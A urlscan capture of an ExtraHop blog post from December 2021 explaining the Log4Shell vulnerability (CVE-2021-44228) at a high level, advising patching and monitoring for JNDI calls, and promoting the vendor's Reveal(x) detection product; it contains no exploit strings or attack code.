www.extrahop.com Open in urlscan Pro
34.210.210.110  Public Scan

URL: https://www.extrahop.com/company/blog/2021/log4j-security-exploit/
Submission: On December 13 via api from US — Scanned from DE

Form analysis 2 forms found in the DOM

Name: untitledForm-1367515949663POST https://s1701.t.eloqua.com/e/f2

<form method="POST" id="form107" name="untitledForm-1367515949663" role="form" action="https://s1701.t.eloqua.com/e/f2" class="reset-disabled" data-parsley-validate="" data-parsley-trigger="focusout" data-onload="extrahop.undisableForm"
  novalidate="">
  <input type="hidden" name="elqFormName" value="untitledForm-1367515949663">
  <input type="hidden" name="elqSiteId" value="1701">
  <input type="hidden" name="elqCampaignId">
  <input type="hidden" name="campaignId" value="70180000001EqjnAAC">
  <input type="hidden" name="elqCustomerGUID">
  <input type="hidden" name="elqCookieWrite" value="0">
  <input type="hidden" name="GA_Medium" value="">
  <input type="hidden" name="GA_Source" value="">
  <input type="hidden" name="GA_Campaign" value="">
  <input type="hidden" name="GA_Content" value="">
  <input type="hidden" name="GA_Term" value="">
  <input type="hidden" name="GA_Product" value="">
  <input type="hidden" name="GA_Region" value="">
  <input type="hidden" name="GA_Funnelstage" value="">
  <input type="hidden" name="GA_Version" value="">
  <input type="hidden" name="gclid" value="">
  <input type="hidden" name="FormURL" value="">
  <input type="hidden" name="uniqueid" value="">
  <input type="hidden" name="adgroupname" value="">
  <input type="hidden" name="redirectUrl" value="https://www.extrahop.com/company/newsletter-signup-success/" data-sync-host="www">
  <div class="inline-input">
    <div class="form-group email">
      <input id="email" class="form-control garlic-auto-save" name="email" type="email" required="" placeholder="Email Address">
    </div>
    <div class="form-group">
      <input type="submit" class="btn btn-basic" value="Subscribe" data-track-newsletter-subscribe="">
    </div>
  </div>
</form>

<form>
  <input class="st-default-search-input st-search-set-focus" type="text" value="" placeholder="Search this site" aria-label="Search this site" id="st-overlay-search-input" autocomplete="off" autocorrect="off" autocapitalize="off">
</form>

Text Content

 * The Platform
   
   
   EXTRAHOP
   REVEAL(X) 360
   
   CLOUD-NATIVE VISIBILITY, DETECTION, AND RESPONSE
   FOR THE HYBRID ENTERPRISE.
   
   Learn More
   
   Explore Reveal(x)
   
   How It Works
   
   Competitive Comparison
   
   Why Decryption Matters
   
   Integrations and Automations
   
   Cybersecurity Services
   
   What is Network Detection and Response (NDR)?
   
   Cloud-Native Security Solutions
   
   Reveal(x) Enterprise: Self-Managed NDR

 * Solutions
   
   --------------------------------------------------------------------------------
   
   
   SOLUTIONS
   
   With the power of machine learning, gain the insight you need to solve
   pressing challenges.
   
   FOR SECURITY
   
   Stand up to threats with real-time detection and fast response.
   
   Learn More >
   
   FOR CLOUD
   
   Gain complete visibility for cloud, multi-cloud, or hybrid environments.
   
   Learn More >
   
   FOR IT OPS
   
   Share information, boost collaboration without sacrificing security.
   
   Learn More >
   
   BY INITIATIVE
   
    * Advanced Threats
    * Security Operations Transformation
    * Enterprise IoT Security
    * Integrate NDR and SIEM
    * Implement Zero Trust
    * Multicloud & Hybrid Cloud Security
   
   BY VERTICAL
   
    * Financial Services
    * Healthcare
    * e-Commerce and Retail
    * U.S. Public Sector
   
   Featured Customer Story
   
   
   WIZARDS OF THE COAST
   
   Wizards of the Coast Delivers Frictionless Security for Agile Game
   Development with ExtraHop
   
   Read More
   
   See All Customer Stories >

 * Customers
   
   --------------------------------------------------------------------------------
   
   
   CUSTOMERS
   
   Our customers stop cybercriminals in their tracks while streamlining
   workflows. Learn how or get support.
   
   COMMUNITY
   
    * Customer Portal Login
    * Solution Bundles Gallery
    * Community Forums
    * Customer Stories
   
   SERVICES
   
    * Services Overview
    * Reveal(x) Advisor
    * Deployment
   
   TRAINING
   
    * Training Overview
    * Training Sessions
   
   SUPPORT
   
    * Support Overview
    * Documentation
    * Hardware Policies
   
   Featured Customer Story
   
   
   WIZARDS OF THE COAST
   
   Wizards of the Coast Delivers Frictionless Security for Agile Game
   Development with ExtraHop
   
   Read More
   
   See All Customer Stories >

 * Partners
   
   --------------------------------------------------------------------------------
   
   
   PARTNERS
   
   Our partners help extend the upper hand to more teams, across more platforms.
   
   CHANNEL PARTNERS
   
    * Channel Overview
    * Managed Services Providers
    * Overwatch Managed NDR
   
   INTEGRATION PARTNERS
   
    * CrowdStrike
    * Amazon Web Services
    * Security for Google Cloud
    * All Technology Partners
   
   PANORAMA PROGRAM
   
    * Partner Program Information
    * Partner Portal Login
    * Become a Partner
   
   Featured Integration Partner
   
   
   CROWDSTRIKE
   
   Detect network attacks. Correlate threat intelligence and forensics.
   Auto-contain impacted endpoints. Inventory unmanaged devices and IoT.
   
   Read More
   
   See All Integration Partners >

 * Blog
 * More
    * About Us
    * News & Events
    * Careers
    * Resources
   
    * About Us
    * The ExtraHop Advantage
    * What Is Cloud-Native?
    * Leadership
    * Board of Directors
    * Contact Us
   
    * Explore the Interactive Online Demo
    * Take the Hunter Challenge
    * Upcoming Webinars and Events
    * Newsroom
   
   
   HUNTER CHALLENGE
   
   Get hands-on with ExtraHop's cloud-native NDR platform in a capture the flag
   style event.
   
   Read More
   
   
   
    * Careers at ExtraHop
    * Search Openings
    * Connect on LinkedIn
   
    * All Resources
    * Customer Stories
    * Remote Access Resource Hub
    * White Papers
    * Datasheets
    * Industry Reports
   
    * Webinars
    * Network Attack Library
    * Protocol Library
    * Documentation
    * Firmware
    * Training Videos


Login
Logout
Start Demo





THE PLATFORM


SOLUTIONS


CUSTOMERS


PARTNERS


BLOG


MORE

START THE DEMO

CONTACT US

Back


EXTRAHOP
REVEAL(X) 360

Cloud-native visibility, detection, and response
for the hybrid enterprise.

Learn More

HOW IT WORKS

COMPETITIVE COMPARISON

WHY DECRYPTION MATTERS

INTEGRATIONS AND AUTOMATIONS

CYBERSECURITY SERVICES

WHAT IS NETWORK DETECTION AND RESPONSE (NDR)?

CLOUD-NATIVE SECURITY SOLUTIONS

REVEAL(X) ENTERPRISE: SELF-MANAGED NDR

Back


SOLUTIONS



Learn More

SECURITY

CLOUD

IT OPS

USE CASES

EXPLORE BY INDUSTRY VERTICAL

Back


CUSTOMERS

Customer resources, training,
case studies, and more.

Learn More

CUSTOMER PORTAL LOGIN

CYBERSECURITY SERVICES

TRAINING

EXTRAHOP SUPPORT

Back


PARTNERS

Partner resources and information about our channel and technology partners.

Learn More

CHANNEL PARTNERS

INTEGRATIONS AND AUTOMATIONS

PARTNERS

Back


BLOG



Learn More
Back


ABOUT US


NEWS & EVENTS


CAREERS


RESOURCES

Back


ABOUT US

See what sets ExtraHop apart, from our innovative approach to our corporate
culture.

Learn More

THE EXTRAHOP ADVANTAGE

WHAT IS CLOUD-NATIVE?

CONTACT US

Back


NEWS & EVENTS

Get the latest news and information.

Learn More

TAKE THE HUNTER CHALLENGE

UPCOMING WEBINARS AND EVENTS

Back


CAREERS

We believe in what we're doing. Are you ready to join us?

Learn More

CAREERS AT EXTRAHOP

SEARCH OPENINGS

CONNECT ON LINKEDIN

Back


RESOURCES

Find white papers, reports, datasheets, and more by exploring our full resource
archive.

All Resources

CUSTOMER STORIES

REMOTE ACCESS RESOURCE HUB

NETWORK ATTACK LIBRARY

PROTOCOL LIBRARY

DOCUMENTATION

FIRMWARE

TRAINING VIDEOS


BLOG


DEFEND AGAINST LOG4J EXPLOITS

 * Jeff Costlow

 * December 10, 2021

A zero-day vulnerability referred to as Log4Shell in the commonly used
Java-based utility Log4j (CVE-2021-44228) has been disclosed. An attacker using
a Log4j exploit can remotely execute code that, once deployed, can grant the
attacker full server control, making the flaw a critical and widespread
cybersecurity threat. Proof-of-concept Log4j exploit examples are currently
available, and attackers are believed to be actively targeting vulnerable
systems.

The flaw allows an attacker to exploit the Java Naming and Directory Interface
(JNDI) API to cause Log4j to execute arbitrary malicious code delivered by the
attacker. Current analysis suggests it's delivered via LDAP or RMI, to a remote
server that then redirects JNDI to reach out to another server, using HTTPS or
another protocol. An emergency patch has been released by Apache. Because Log4j
is ubiquitous in commonly used Java apps such as Jira, iCloud, and Minecraft,
many users have the software deployed and are unaware that it is running in
their environment.

While the total impact of affected applications and devices is not yet known,
further proofs-of-concept indicate that attackers may be able to target physical
devices such as iPhones, in addition to cloud-based services and apps, deepening
the potential risk. Reports quickly surfaced of observed scanning behavior:








REMEDIATION AND DETECTION

Log4J exploits have been discovered using alternate ports or evasion encodings
as well as using TOR to hide identifying details.

Immediate updates of software containing the Log4j utility are recommended,
however, due to complex supply chain dependencies, vulnerable users are
dependent on suppliers to patch systems and release the necessary updates.
Unfortunately, many users lack awareness of which applications are vulnerable.



Behavior transparency could reduce software supply chain risks.




Understanding that baseline behavior for affected applications can help
organizations identify indicators of compromise associated with this flaw, which
is where machine-learning-based detections from a network detection and response
solution can assist.


ADDRESSING LOG4J WITH EXTRAHOP REVEAL(X) 360

Reveal(x) transaction records can be searched for JNDI calls, which can provide
a starting point for investigating potential exploit attempts. If new JNDI calls
are observed to external endpoints, the external IPs should be blocked
immediately. If using JNDI calls is an expected behavior, then further
investigation may be required to identify whether the activity is malicious or
benign.

ExtraHop is releasing a Threat Briefing and a detector for the vulnerability,
which will be deployed automatically for Reveal(x) customers. The ExtraHop
Threat Research Team is closely monitoring for new PoCs, and will provide
updates as more information becomes available.

Due to the widespread nature of this CVE, ExtraHop advises that all
organizations assume the Log4j exploit has been used against them, and continue
to actively monitor their network for signs of compromise.

 * Posted in Cybersecurity, Security Alerts, NDR
 * See other posts by Jeff Costlow


HUNT THREATS WITH REVEAL(X)

Investigate a live attack in the full product demo of ExtraHop Reveal(x),
network detecion and response for the hybrid enterprise.

Start Demo


RELATED BLOGS

10.25.21


WILDCARD CERTIFICATE RISKS AND THE ALPACA TLS ATTACK

Understand wildcard certificate risks, the ALPACA attack, and how to check
whether wildcard certificates are putting your organization at risk.

Jeff Costlow

9.23.21


UNDERSTAND AND DETECT VCENTER VULNERABILITY EXPLOITATION

The vulnerability to vCenter Server presents serious risk to organizations.
Learn how to detect malicious activity surrounding this vulnerability.

Jeff Costlow

11.9.21


PRINTNIGHTMARE VULNERABILITY: DETECTION, EXPLANATION, AND MITIGATION

What you need to know about the latest PrintNightmare vulnerability
(CVE-2021-34527), how it differs from other recent issues with the Print Spooler
service, and what you can do to secure your organization.

Jeff Costlow


SIGN UP TO STAY INFORMED

Javascript is required to submit this form


+

ExtraHop uses cookies to improve your online experience. By using this website,
you consent to the use of cookies. Learn More

Global Headquarters
520 Pike St
Suite 1600
Seattle, WA 98101
United States

EMEA Headquarters
WeWork 8
Devonshire Square
London EC2M 4PL
United Kingdom

APAC Headquarters
3 Temasek Avenue
Centennial Tower
Level 18
Singapore 039190

PLATFORM

 * Reveal(x) 360
 * How It Works
 * Competitive Comparison
 * Why Decryption Matters
 * Integrations and Automations
 * Cybersecurity Services
 * What is Network Detection and Response (NDR)?
 * Cloud-Native Security Solutions
 * Reveal(x) Enterprise: Self-Managed NDR

SOLUTIONS

 * Security
 * Cloud
 * IT Ops
 * Use Cases
 * Industries

CUSTOMERS

 * Customer Portal Login
 * Services Overview
 * Training Overview
 * Support Overview

PARTNERS

 * Channel Overview
 * Technology Integration Partners
 * Partner Program Information

BLOG

MORE

 * About Us
 * News & Events
 * Careers
 * Resources

 * Copyright ExtraHop Networks 2021
 * Terms of Use
 * Privacy Policy

 * Facebook
 * Twitter
 * LinkedIn
 * Instagram
 * YouTube




Close


suggested results